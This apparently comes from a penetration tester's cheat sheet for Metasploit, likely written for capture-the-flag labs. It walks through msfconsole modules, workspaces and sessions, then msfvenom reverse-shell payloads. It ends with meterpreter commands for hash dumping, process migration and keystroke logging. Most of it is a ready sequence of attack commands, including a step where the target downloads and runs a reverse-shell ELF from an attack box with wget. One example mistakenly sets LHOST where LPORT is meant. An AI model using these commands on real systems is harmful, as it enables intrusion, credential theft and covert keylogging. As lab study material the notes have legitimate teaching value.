MSFCONSOLE
Finding Modules
Let's use port scanning as an example:
search portscanpick a scanner:
use # <-- this is the number to the left of the modulethen use
show optionsto see what options are available for your choice. Set your options (for example):
set RHOSTS 10.10.12.148Some modules have multiple payloads. Make sure to show options as they may change.
show payloads <-- Show the available payloads
set payload # <-- choose which payload to use.Setting up a project database
Before you start msfconsole:
systemctl start postgresql
msfdb initStart msfconsole then check
db_statusWorking with workspaces (workspace -h):
workspace <-- lists workspaces
workspace -a timmy <-- creates a new workspace named timmy
workspace default <-- switches from timmy back to the default workspace
workspace -d timmy <-- deletes the workspace called timmyOnce you're into a workspace you can use 'help' to see the things you can do and store in that database. For example running 'db_nmap -sV -p- 10.10.12.229' will do an nmap scan and store all the information into the database so you can recall it later.
hosts or services -h <--help
hosts <-- shows all the hosts it found
services <-- shows all the services it found for those hosts
services -S netbios <-- shows the service for just netbios
hosts -R <-- will set the host for RHOSTS in all modules. If there are more than one host it will set them all as the RHOSTS option.Working with Sessions
sessions <-- see your sessions
sessions -i # <-- interact with the numbered session
ctrl+z <-- background a session
ctrl+c <-- exit a sessionAccept Incoming Shells
use exploit/multi/handler <-- catches shells used in metasploitAn example usage:
use exploit/multi/handler
set payload php/reverse_php
set lhost 10.10.24.119
set lport 7777
show options
runMSFVENOM
This let's you create payloads - its a side hustle on the metasploit side.
msfvenom -l payloads <-- list all the payloads
msfvenom -l payloads | grep "linux/x86" | grep "reverse_tcp" <-- search for a linux payload that gives us a reverse tcp connection
msfvenom -p <--list supported output formats
-e <-- encodes (not obfuscate, just encode)
msfvenom -p php/reverse_php LHOST=10.0.2.19 LPORT=7777 -f raw > reverse_shell.php <-- example php reverse shell ** NOTE you will need to add the PHP tags to this, be sure to edit after.An Example
We have access to a device to upload a file, it's a linux system.
First, we create a reverse shell on our attack box using msfvenom
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f elf > rev_shell.elfNext we host it on a python web server on our attack box
python3 -m http.server 9000We download the file on the vulnerable linux box
wget http://[ATTACK-BOX]:9000/rev_shell.elfWe set it as executable
chmod +x rev_shell.elfWe run the .elf file on the vulnerable linux box
./rev_shell.elfSwitching back over to our attack box we start msfconsole and start the listener.
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST [ATTACK-BOX-IP]
set LHOST 4444
runThis should catch our reverse shell. Now that we have a shell, we background it with ctrl+z, taking note of the session number. We then search for an exploit to use - in this example we're going to dump hashes
search linux hashes
use 0
set session 2
exploit
METERPRETER
Meterpreter will run in memory, as a process, on the target system and act as an encrypted TLS agent within a command and control architecture.
Always run the help menu to see the available commands. Each meterpreter shell is different based on the system and payload it's using. Here are a few commands that might be useful
getuid <-- see which user you're running as.
hashdump <-- dump the SAM database hashes
search -f flag.txt <-- searches for a file named flag.txt
shell <-- get a cmd shell (ctrl+z will bring you back)
load python <-- loads python modules, can also use others like kiwi (mimikatz), etcMoving your meterpreter process to that of another app can sometimes provide useful (just note you may loose your privilages). For example, say we list the running processes using PS. We see word there so we migrate to that process and start capturing keystrokes:
ps
migrate 1276
keyscan_start
keyscan_stop
keyscan_dump